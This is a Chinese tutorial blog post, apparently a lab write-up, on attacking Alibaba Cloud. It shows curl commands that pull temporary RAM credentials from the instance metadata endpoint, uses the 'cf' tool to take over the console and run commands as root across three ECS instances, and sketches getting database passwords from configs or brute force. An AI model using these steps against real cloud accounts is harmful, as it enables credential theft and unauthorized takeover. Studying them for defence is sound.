云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

简介: 云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

前言

元数据解释:


实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)


细节方面可通过访问官网找元数据访问触发说明,阿里云示例:

https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata


云服务-弹性计算-元数据&SSRF&AK

环境搭建

这里是否启用实例元数据访问通道是默认开启的

创建RAM用户并添加相关测试权限

授予RAM角色,实例绑定RAM角色将授予实例该角色所拥有的所有权限

思路就是通过拿到的一台云服务器获取ecs用户临时凭证,进行该RAM用户下其他服务器的横向

1、前提条件:

-弹性计算配置访问控制角色
-SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)


2、利用环境1:获取某服务器权限后横向移动

-获取关键信息

curl http://100.100.100.200/latest/meta-data/

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

-获取临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

此时这个临时凭证的权限就是RAM用户创建时的被授予的权限

这里斥巨资开了三台服务器进行演示 同一RAM管理

利用AK横向移动

cf工具访问配置

一键列出当前访问凭证的权限

一键接管控制台

这里也是直接登陆接管

一键列出当前访问凭证的云服务资源

一键命令执行

C:\Users\xxxxxx\Desktop\工具\cf_v0.5.0_windows_amd64>cf alibaba ecs exec -b
? 选择一个实例 (Choose a instance):  全部实例 (all instances)

1 i-2ze00ghuljor8w95rlsu (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze00ghuljor8w95rlsuZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.152  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe2e:823b  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2e:82:3b  txqueuelen 1000  (Ethernet)
        RX packets 89310  bytes 132214717 (126.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7650  bytes 669146 (653.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2  bytes 140 (140.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 140 (140.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


2 i-2ze387xap5u9w3plim4w (launch-advisor-20231012) > whoami && hostname && ipconfig

nt authority\system
iZp5u9w3plim4wZ

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::4dc3:a60d:1f10:54b3%4
   IPv4 地址 . . . . . . . . . . . . : 172.22.69.151
   子网掩码  . . . . . . . . . . . . : 255.255.240.0
   默认网关. . . . . . . . . . . . . : 172.22.79.253


3 i-2ze7ixs89bnm9ofchpso (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze7ixs89bnm9ofchpsoZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.150  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe36:8720  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:36:87:20  txqueuelen 1000  (Ethernet)
        RX packets 2300  bytes 1160685 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2296  bytes 288204 (281.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

不过对方服务器会告警emmmm:

3、利用环境2:某服务器上Web资产存在SSRF漏洞

搭建靶场太麻烦了,原理就是利用ssrf请求带外回显出临时凭证,其他操作同上

云服务-云数据库-外部连接&权限提升

环境搭建

默认不开启外网连接,所以安全性较高,

开通外网连接进行测试

1、帐号密码:

源码配置中找到(几率高)或爆破手段(几率低)

2、连接获取:

-白名单&外网 直接Navicat支持连接


-内网需要其中内网某一个服务器做转发

遇到了再来补

3、AK利用(权限提升)

相关实践学习
通义万相文本绘图与人像美化
本解决方案展示了如何利用自研的通义万相AIGC技术在Web服务中实现先进的图像生成。
7天玩转云服务器
云服务器ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,可降低 IT 成本,提升运维效率。本课程手把手带你了解ECS、掌握基本操作、动手实操快照管理、镜像管理等。了解产品详情:&nbsp;https://www.aliyun.com/product/ecs
相关文章
|
4月前
|
存储 数据管理 API
HarmonyOS5云服务技术分享--云数据库使用指南
华为云数据库(CloudDB)在HarmonyOS中的使用指南,涵盖数据增删改查及高级查询功能。通过简单API实现数据持久化、实时同步与加密存储,支持批量操作和复杂查询优化。本文提供代码示例与最佳实践,助你高效管理应用数据。快来动手实践吧!
|
存储 C# 关系型数据库
“云端融合:WPF应用无缝对接Azure与AWS——从Blob存储到RDS数据库,全面解析跨平台云服务集成的最佳实践”
【8月更文挑战第31天】本文探讨了如何将Windows Presentation Foundation(WPF)应用与Microsoft Azure和Amazon Web Services(AWS)两大主流云平台无缝集成。通过具体示例代码展示了如何利用Azure Blob Storage存储非结构化数据、Azure Cosmos DB进行分布式数据库操作;同时介绍了如何借助Amazon S3实现大规模数据存储及通过Amazon RDS简化数据库管理。这不仅提升了WPF应用的可扩展性和可用性,还降低了基础设施成本。
290 0
|
存储 小程序 数据库
【微信小程序-原生开发】实用教程08 - 开通微信云开发,操作云数据库新增数据(含修改数据权限),初始化云服务(含获取微信云环境 id),获取云数据,滚动公告栏
【微信小程序-原生开发】实用教程08 - 开通微信云开发,操作云数据库新增数据(含修改数据权限),初始化云服务(含获取微信云环境 id),获取云数据,滚动公告栏
275 0
|
Oracle 关系型数据库 MySQL
数据库之-元数据 DatabaseMetaData 初学(二)
数据库之-元数据 DatabaseMetaData 初学(二)
299 0
|
SQL 存储 关系型数据库
MySQL数据库——锁-表级锁(表锁、元数据锁、意向锁)
MySQL数据库——锁-表级锁(表锁、元数据锁、意向锁)
766 0
|
NoSQL 安全 MongoDB
MongoDB为提供MongoDB数据库服务的云服务合作伙伴推出认证计划
Certified by MongoDB DBaaS计划还将为云计算合作伙伴提供构建深度技术集成所需的专业支持,同时还将携手MongoDB合作伙伴生态系统(MongoDB Partner Ecosystem)共同推出一系列联合的进入市场举措,使云服务合作伙伴能够助力其客户快速走向成功。
3206 0
|
Oracle 关系型数据库 MySQL
数据库之-元数据 DatabaseMetaData 初学(一)
数据库之-元数据 DatabaseMetaData 初学(一)
466 0
|
Windows
ArcGIS:如何连接文件夹、修改元数据样式、建立个人地理数据库、复制移动文件?
ArcGIS:如何连接文件夹、修改元数据样式、建立个人地理数据库、复制移动文件?
585 0
|
存储 Cloud Native Oracle
率先通过信通院可信云服务测评!阿里云PolarDB数据库斩获殊荣
昨日,由中国信息通信研究院(以下简称“信通院”)主办的 2020 云原生产业大会隆重召开。针对行业的热点和痛点,为了进一步规范云原生数据库产品,信通院面向云原生领域厂商进行了云原生数据库服务能力标准测评。10月,阿里云成为率先通过信通院可信云服务测试的云数据库厂商,引领国内云原生数据库标准的风向标。
率先通过信通院可信云服务测评!阿里云PolarDB数据库斩获殊荣
|
监控 关系型数据库 MySQL
02.熟悉云数据库 MySQL 版控制台|学习笔记
快速学习02.熟悉云数据库 MySQL 版控制台
02.熟悉云数据库 MySQL 版控制台|学习笔记

热门文章

最新文章